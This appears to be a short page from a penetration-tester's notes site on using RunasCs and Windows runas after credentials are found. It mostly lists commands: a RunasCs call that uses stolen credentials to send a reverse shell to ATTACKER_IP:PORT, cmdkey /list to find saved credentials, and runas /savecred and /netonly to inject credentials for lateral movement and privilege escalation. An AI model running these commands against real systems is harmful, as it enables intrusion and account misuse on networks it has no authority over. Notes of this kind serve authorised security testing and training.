search
githubEdit

Runas

hashtag
Use case:

hashtag
Use this when we have found credentials for a user, but we have no other methods to authenticate (Win-RM, etc). Essentialy, we inject the credentials found in memory to authenticate with these valid credentials. Can be used to switch users on the current host only!

hashtag
Github repo: https://github.com/antonioCoco/RunasCs/releases/tag/v1.5

hashtag
Command:

.\RunasCs.exe USERNAME PASSWORD cmd.exe ATTACKER_IP:PORT (Execute a reverse shell as the authenticated user for lateral movement/privesc)

hashtag
More Commands

hashtag
1)

cmdkey /list

hashtag
2)

runas /savecred /user:USER\DOMAIN cmd.exe

hashtag
Credential Injection

runas.exe /netonly /user:DOMAIN\USERNAME cmd.exe

hashtag
Use credentials we found in case that we don't know where to exactly use them.

hashtag
TIP:

hashtag
With /netonly, it can accept any password.

PreviousRemote Processes SpawnNextSCCM Admin

Last updated